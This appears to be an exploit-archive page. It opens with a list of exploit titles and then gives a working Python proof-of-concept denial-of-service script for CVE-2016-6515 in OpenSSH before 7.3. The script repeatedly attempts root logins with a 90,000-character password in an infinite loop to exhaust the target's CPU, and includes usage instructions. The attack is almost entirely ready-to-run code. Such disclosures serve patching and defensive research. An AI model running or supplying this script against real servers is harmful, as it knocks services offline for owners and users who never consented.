0231ae9ba7
5 new exploits Dual DHCP DNS Server 7.29 - Denial of Service TP-LINK TD-W8951ND - Denial of Service OpenSSH 7.2 - Denial of Service Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Advanced Webhost Billing System (AWBS) - cart2.php Remote File Inclusion Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion AWBS 2.7.1 - (news.php viewnews) SQL Injection Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) - Multiple Security Vulnerabilities Simple Machines Forum (SMF) 1.1.10/2.0 RC2 - Multiple Security Vulnerabilities Advanced Webhost Billing System 2.2.2 - contact.php Multiple Cross-Site Scripting Vulnerabilities Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Advanced Webhost Billing System (AWBS) 2.9.2 - 'oid' Parameter SQL Injection Simple Machines Forum (SMF) 2.0.2 - 'index.php' scheduled Parameter Cross-Site Scripting Simple Machines Forum (SMF) 2.0.2 - 'scheduled' Parameter Cross-Site Scripting Cisco Unified Communications Manager 7/8/9 - Directory Traversal
78 lines
2.4 KiB
Python
Executable file
78 lines
2.4 KiB
Python
Executable file
################################################################################
|
|
# Title : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
|
|
# Author : Kashinath T (tkashinath@secpod.com) (www.secpod.com)
|
|
# Vendor : http://www.openssh.com/
|
|
# Software : http://www.openssh.com/
|
|
# Version : OpenSSH before 7.3
|
|
# Tested on : Ubuntu 16.04 LTS, Centos 7
|
|
# CVE : CVE-2016-6515
|
|
# Date : 20-10-2016
|
|
#
|
|
# NOTE:
|
|
# If the remote machine is installed and running OpenSSH version prior to 7.3,
|
|
# it does not limit the password length for authentication. Hence, to exploit
|
|
# this vulnerability' we will send a crafted data which is of 90000 characters
|
|
# in length to the 'password' field while attempting to log in to a remote
|
|
# machine via ssh with username as 'root'.
|
|
#
|
|
# For more info refer,
|
|
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
|
|
################################################################################
|
|
|
|
import sys
|
|
from random import choice
|
|
from string import lowercase
|
|
|
|
try:
|
|
import paramiko
|
|
except ImportError:
|
|
print "[-] python module 'paramiko' is missing, Install paramiko with" \
|
|
" following command 'sudo pip install paramiko'"
|
|
sys.exit(0)
|
|
|
|
|
|
class ssh_exploit:
|
|
|
|
def __init__(self):
|
|
"""
|
|
Initialise the objects
|
|
"""
|
|
|
|
def ssh_login(self, remote_ip):
|
|
|
|
try:
|
|
# Crafted password of length 90000
|
|
passwd_len = 90000
|
|
crafted_passwd = "".join(choice(lowercase)
|
|
for i in range(passwd_len))
|
|
|
|
# Connect to a remote machine via ssh
|
|
ssh = paramiko.SSHClient()
|
|
ssh.load_system_host_keys()
|
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
|
|
# calling connect in infinite loop
|
|
print "[+] Entering infinite loop"
|
|
while 1:
|
|
ssh.connect(remote_ip, username='root',
|
|
password=crafted_passwd)
|
|
|
|
except Exception, msg:
|
|
print "Error in connecting to remote host : ", remote_ip
|
|
print "Exception in : ssh_login method."
|
|
sys.exit(msg)
|
|
|
|
|
|
def main():
|
|
|
|
if len(sys.argv) != 2:
|
|
print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
|
|
sys.exit()
|
|
|
|
# Calling ssh_connect
|
|
ref_obj = ssh_exploit()
|
|
ref_obj.ssh_login(sys.argv[1])
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|